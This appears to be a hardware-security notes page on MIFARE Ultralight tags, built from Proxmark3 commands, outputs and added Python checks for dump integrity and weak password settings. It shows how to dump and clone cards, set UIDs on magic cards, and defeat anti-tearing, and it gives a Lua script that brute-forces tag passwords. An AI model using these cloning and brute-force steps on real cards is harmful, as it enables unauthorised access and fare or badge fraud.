MIFARE Ultralight

  • Operates at 13.56 MHz
  • Uses the ISO/IEC 14443-3 protocols
  • Optional password, but it is transmitted in clear text

Documentation

MIFARE Ultralight Gen1A

  • Password Authentication

Read an Ultralight:

[usb] pm3 --> hf mfu info

[=] --- Tag Information --------------------------
[+]       TYPE: MIFARE Ultralight (MF0ICU1)
[+]        UID: 04 B7 66 DA A5 4F 80
[+]     UID[0]: 04, NXP Semiconductors Germany
[+]       BCC0: 5D ( ok )
[+]       BCC1: B0 ( ok )
[+]   Internal: 48 ( default )
[+]       Lock: 00 00  - 0000000000000000
[+] OneTimePad: 00 00 00 00  - 00000000000000000000000000000000
[=] ------------------------ Fingerprint -----------------------
[=] Reading tag memory...
[=] ------------------------------------------------------------

Dump Memory:

[usb] pm3 --> hf mfu dump
[+] TYPE: MIFARE Ultralight (MF0ICU1)
[+] Reading tag memory...

[=] MFU dump file information
[=] -------------------------------------------------------------
[=] Version..... 00 00 00 00 00 00 00 00
[=] TBD 0....... 00 00
[=] TBD 1....... 00
[=] Signature... 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[=]              00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[=] Counter 0... 00 00 00
[=] Tearing 0... 00
[=] Counter 1... 00 00 00
[=] Tearing 1... 00
[=] Counter 2... 00 00 00
[=] Tearing 2... 00
[=] Max data page... 14 ( 60 bytes )
[=] Header size..... 56 bytes

[=] -------------------------------------------------------------
[=] block#   | data        |lck| ascii
[=] ---------+-------------+---+------
[=]   0/0x00 | 04 47 0E C5 |   | .G..
[=]   1/0x01 | 0A F1 33 84 |   | ..3.
[=]   2/0x02 | 4C 48 F8 01 |   | LH..
[=]   3/0x03 | F4 1B 48 15 | 1 | ..H.
[=]   4/0x04 | 54 30 35 33 | 1 | T053
[=]   5/0x05 | 37 30 32 30 | 1 | 7020
[=]   6/0x06 | 33 39 32 30 | 1 | 3920
[=]   7/0x07 | 30 31 38 32 | 1 | 0182
[=]   8/0x08 | 32 38 31 39 | 1 | 2819
[=]   9/0x09 | FF FF FF FF | 0 | ....
[=]  10/0x0A | FF FF FF FF | 0 | ....
[=]  11/0x0B | FF FF FF FF | 0 | ....
[=]  12/0x0C | FF FF FF FF | 0 | ....
[=]  13/0x0D | FF FF FF FF | 0 | ....
[=]  14/0x0E | FF FF FF FF | 0 | ....
[=]  15/0x0F | FF FF FF FF | 0 | ....
[=] ---------------------------------
[=] Using UID as filename
[+] saved 120 bytes to binary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-mfu-04470E0AF13384-dump-001.bin
[+] saved to json file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-mfu-04470E0AF13384-dump-001.json
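
The UID, the two BCC check bytes and the `lck` column in the dump table above can all be recomputed from pages 0-2. This is an added example, not part of the original page or of the Proxmark3 client; `parse_header` is a hypothetical helper name, and the second sample is constructed.

```python
# Added example: recompute UID, BCC and lock state from pages 0-2 of a dump.
CASCADE_TAG = 0x88  # ISO/IEC 14443-3 cascade tag, part of BCC0 for 7-byte UIDs


def parse_header(pages):
    """pages: sequence whose first three items are the 4-byte pages 0, 1, 2."""
    if len(pages) < 3 or any(len(p) != 4 for p in pages[:3]):
        raise ValueError("need pages 0-2, 4 bytes each")
    p0, p1, p2 = (bytes(p) for p in pages[:3])
    uid = p0[:3] + p1                       # p0[3] is BCC0, not a UID byte
    bcc0 = CASCADE_TAG ^ uid[0] ^ uid[1] ^ uid[2]
    bcc1 = uid[3] ^ uid[4] ^ uid[5] ^ uid[6]
    lock0, lock1 = p2[2], p2[3]
    locked = [3] if lock0 & 0x08 else []    # bit 3 of lock byte 0: OTP page
    locked += [n for n in range(4, 8) if (lock0 >> n) & 1]    # pages 4-7
    locked += [n + 8 for n in range(8) if (lock1 >> n) & 1]   # pages 8-15
    return {
        "uid": uid.hex().upper(),
        "bcc0_ok": bcc0 == p0[3],
        "bcc1_ok": bcc1 == p2[0],
        "internal": p2[1],
        "locked_pages": locked,
        "block_lock_bits": lock0 & 0x07,    # bits that freeze the lock bits
    }


# Pages 0-2 exactly as listed in the `hf mfu dump` table above.
DUMPED = [bytes.fromhex(h) for h in ("04470EC5", "0AF13384", "4C48F801")]
# Constructed: same pages with one UID byte altered, so BCC0 no longer matches.
CORRUPT = [bytes.fromhex(h) for h in ("04480EC5", "0AF13384", "4C48F801")]

if __name__ == "__main__":
    print(parse_header(DUMPED))
    print(parse_header(CORRUPT))
```

A dump whose BCC bytes do not match its UID was either read incorrectly or edited by hand, which is worth checking before trusting the rest of the file.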

Clone Card:

[usb] pm3 --> hf mfu restore -f hf-mfu-04470E0AF13384-dump-001.bin
[+] loaded 120 bytes from binary file `hf-mfu-04470E0AF13384-dump-001.bin`
[=] Restoring hf-mfu-04470E0AF13384-dump-001.bin to card

Brute force Script:

local getopt = require('getopt')
local utils = require('utils')

-- Return a true value if the named file can be opened for reading
local function file_exists(name)
    local f = io.open(name, 'r')
    return f ~= nil and io.close(f)
end

-- Convert a string into a hex string
local function convert_string_to_hex(str)
    return (
        str:gsub('.', function (c)
            return string.format('%02X', string.byte(c))
        end)
    )
end

-- Convert an integer into a hex string
local function convert_int_to_hex(int)
    return string.format('%x', int)
end

local function main(args)
    local start_id = 0x00000000
    local end_id = 0xFFFFFFFF

    -- both -s and -e take an argument, so each letter is followed by ':'
    for option, argument in getopt.getopt(args, 's:e:') do
        -- start hex value
        if option == 's' then
            print('Start Key ' .. argument)
            start_id = tonumber(argument, 16)
        end
        -- end hex value
        if option == 'e' then
            end_id = tonumber(argument, 16)
        end
    end

    print('Starting bruteforce from key 0x' .. ('%08x'):format(start_id) .. ' to dump the data')
    for i = start_id, end_id, 1 do
        local key = ('%08x'):format(i)
        local outfile = 'decrypted_' .. key .. '.bin'
        print('Trying key ' .. key)
        --print('hf mfu dump -k ' .. key .. ' -f ' .. outfile)
        core.console('hf mfu dump -k ' .. key .. ' -f ' .. outfile)
        -- a dump file is only written when the key was accepted
        if file_exists(outfile) then
            print('Found key ' .. key)
            return true
        end
    end
end

main(args)

MIFARE Ultralight DirectWrite

MIFARE Ultralight EV1 DirectWrite

MIFARE Ultralight EV1 Magic Card

Change UID:

[usb] pm3 --> hf mfu setuid -u 01020304050607
[=] Please ignore possible transient BCC warnings
[usb] pm3 --> hf mfu info

[=] --- Tag Information --------------------------
[+]       TYPE: MIFARE Ultralight EV1 48bytes (MF0UL1101) ( magic  )
[+]        UID: 01 02 03 04 05 06 07
[+]     UID[0]: 01, Motorola UK
[+]       BCC0: 88 ( ok )
[+]       BCC1: 00 ( ok )
[+]   Internal: 00 ( not default )
[+]       Lock: 00 00  - 0000000000000000
[+] OneTimePad: 00 00 00 00  - 00000000000000000000000000000000

MIFARE Ultralight EV1

Card Info:

[usb] pm3 --> hf mfu info

[=] --- Tag Information --------------------------
[+]       TYPE: MIFARE Ultralight EV1 48bytes (MF0UL1101)
[+]        UID: 04 46 DF CA 5B 62 80
[+]     UID[0]: 04, NXP Semiconductors Germany
[+]       BCC0: 15 ( ok )
[+]       BCC1: 73 ( ok )
[+]   Internal: 48 ( default )
[+]       Lock: 00 00  - 0000000000000000
[+] OneTimePad: 00 00 00 00  - 00000000000000000000000000000000

[=] --- Tag Counters
[=]        [0]: 00 00 00
[+]             - BD tearing ( ok )
[=]        [1]: 00 00 00
[+]             - BD tearing ( ok )
[=]        [2]: 00 00 00
[+]             - BD tearing ( ok )

[=] --- Tag Silicon Information
[=]        Wafer Counter: 17582969 ( 0x10C4B79 )
[=]    Wafer Coordinates: x 70, y 223 (0x46, 0xDF)
[=]            Test Site: 2

[=] --- Tag Version
[=]        Raw bytes: 00 04 03 01 01 00 0B 03
[=]        Vendor ID: 04, NXP Semiconductors Germany
[=]     Product type: Ultralight
[=]  Product subtype: 01, 17 pF
[=]    Major version: 01
[=]    Minor version: 00
[=]             Size: 0B, (64 <-> 32 bytes)
[=]    Protocol type: 03, ISO14443-3 Compliant

[=] --- Tag Configuration
[=]   cfg0 [16/0x10]: 00 00 00 FF
[=]                     - strong modulation mode disabled
[=]                     - pages don't need authentication
[=]   cfg1 [17/0x11]: 00 05 00 00
[=]                     - Unlimited password attempts
[=]                     - NFC counter disabled
[=]                     - NFC counter not protected
[=]                     - user configuration writeable
[=]                     - write access is protected with password
[=]                     - 05, Virtual Card Type Identifier is default
[=]   PWD  [18/0x12]: 00 00 00 00 - (cannot be read)
[=]   PACK [19/0x13]: 00 00       - (cannot be read)
[=]   RFU  [19/0x13]:       00 00 - (cannot be read)

[+] --- Known EV1/NTAG passwords
[+] Found default password FF FF FF FF  pack 00 00
[=] ------------------------ Fingerprint -----------------------
[=] Reading tag memory...
[=] ------------------------------------------------------------

Read Memory:

[usb] pm3 --> hf mfu dump -k "FFFFFFFF"
[+] TYPE: MIFARE Ultralight EV1 48bytes (MF0UL1101)
[+] Reading tag memory...

[=] MFU dump file information
[=] -------------------------------------------------------------
[=] Version..... 00 04 03 01 01 00 0B 03
[=] TBD 0....... 00 00
[=] TBD 1....... 00
[=] Signature... 21 46 AA 5B B9 7E D9 BF E2 5B E2 9D 56 E0 AF C3
[=]              7F 43 DB 50 8B B2 3C 9E 69 70 21 EC A3 E9 56 B1
[=] Counter 0... 00 00 00
[=] Tearing 0... BD
[=] Counter 1... 00 00 00
[=] Tearing 1... BD
[=] Counter 2... 00 00 00
[=] Tearing 2... BD
[=] Max data page... 18 ( 76 bytes )
[=] Header size..... 56 bytes

[=] -------------------------------------------------------------
[=] block#   | data        |lck| ascii
[=] ---------+-------------+---+------
[=]   0/0x00 | 04 46 DF 15 |   | .F..
[=]   1/0x01 | CA 5B 62 80 |   | .[b.
[=]   2/0x02 | 73 48 00 00 |   | sH..
[=]   3/0x03 | 00 00 00 00 | 0 | ....
[=]   4/0x04 | 00 00 00 00 | 0 | ....
[=]   5/0x05 | 00 00 00 00 | 0 | ....
[=]   6/0x06 | 00 00 00 00 | 0 | ....
[=]   7/0x07 | 00 00 00 00 | 0 | ....
[=]   8/0x08 | 00 00 00 00 | 0 | ....
[=]   9/0x09 | 00 00 00 00 | 0 | ....
[=]  10/0x0A | 00 00 00 00 | 0 | ....
[=]  11/0x0B | 00 00 00 00 | 0 | ....
[=]  12/0x0C | 00 00 00 00 | 0 | ....
[=]  13/0x0D | 00 00 00 00 | 0 | ....
[=]  14/0x0E | 00 00 00 00 | 0 | ....
[=]  15/0x0F | 00 00 00 00 | 0 | ....
[=]  16/0x10 | 00 00 00 FF | 0 | ....
[=]  17/0x11 | 00 05 00 00 | 0 | ....
[=]  18/0x12 | FF FF FF FF | 0 | ....
[=]  19/0x13 | 00 00 00 00 | 0 | ....
[=] ---------------------------------
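
The configuration pages shown in the `hf mfu info` and `hf mfu dump` output above (cfg0, cfg1, PWD) can be decoded and checked for weak settings. This is an added example, not part of the original page or of the Proxmark3 client; `audit_ev1_config` is a hypothetical helper, and the hardened values are constructed for comparison.

```python
# Added example: decode the EV1 configuration pages and flag weak settings.
DEFAULT_PWD = bytes.fromhex("FFFFFFFF")  # default reported by `hf mfu info`


def audit_ev1_config(cfg0, cfg1, last_page, pwd=None):
    """cfg0/cfg1 are the two 4-byte configuration pages, last_page the
    highest page number on the tag, pwd the 4-byte password if known."""
    if len(cfg0) != 4 or len(cfg1) != 4:
        raise ValueError("configuration pages are 4 bytes each")
    auth0 = cfg0[3]                 # first page that requires the password
    access = cfg1[0]
    prot = bool(access & 0x80)      # 0: writes protected, 1: reads and writes
    cfglck = bool(access & 0x40)    # 1: configuration permanently locked
    authlim = access & 0x07         # 0: unlimited failed attempts

    findings = []
    if auth0 > last_page:
        findings.append("AUTH0=0x%02X is past the last page: nothing is protected" % auth0)
    if authlim == 0:
        findings.append("AUTHLIM=0: unlimited password attempts")
    if not cfglck:
        findings.append("CFGLCK=0: configuration pages can still be rewritten")
    if pwd == DEFAULT_PWD:
        findings.append("PWD is the factory default FFFFFFFF")
    return {
        "protected_from": auth0 if auth0 <= last_page else None,
        "read_protected": prot and auth0 <= last_page,
        "max_failed_attempts": authlim or None,
        "findings": findings,
    }


# Values from the output above (MF0UL1101, pages 0-19).
PAGE_TAG = audit_ev1_config(bytes.fromhex("000000FF"), bytes.fromhex("00050000"),
                            last_page=19, pwd=DEFAULT_PWD)

# Constructed comparison: password required from page 4, reads protected,
# five failed attempts allowed, configuration locked, non-default password.
HARDENED = audit_ev1_config(bytes.fromhex("00000004"), bytes.fromhex("C5050000"),
                            last_page=19, pwd=bytes.fromhex("A1B2C3D4"))

if __name__ == "__main__":
    for name, result in (("page tag", PAGE_TAG), ("hardened", HARDENED)):
        print(name, result)
```

An attempt limit does not change the other point this page makes, that the password is transmitted in clear text.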

Monotonic Counter Anti-Tearing Defeated

Anti-Tearing: a feature on RFID tags whereby the card only writes to its memory when it has enough power to perform the write.

Note

If we can control the EEPROM power, we can interrupt its erase and/or write operations. This can be helpful if we can't already write any value to the EEPROM.

Source

MIFARE Ultralight AES

MIFARE Ultralight Magic

Write Blocks:

[usb] pm3 --> hf mfu setuid --uid 01020304050607
[=] Please ignore possible transient BCC warnings
[usb] pm3 --> hf mfu info

[=] --- Tag Information --------------------------
[+]       TYPE: Unknown 000000
[+]        UID: 01 02 03 04 05 06 07
[+]     UID[0]: 01, Motorola UK
[+]       BCC0: 88 ( ok )
[+]       BCC1: 00 ( ok )
[+]   Internal: 00 ( not default )
[+]       Lock: 00 00  - 0000000000000000
[+] OneTimePad: 00 00 00 00  - 00000000000000000000000000000000
[=] ------------------------ Fingerprint -----------------------
[=] Reading tag memory...
[=] ------------------------------------------------------------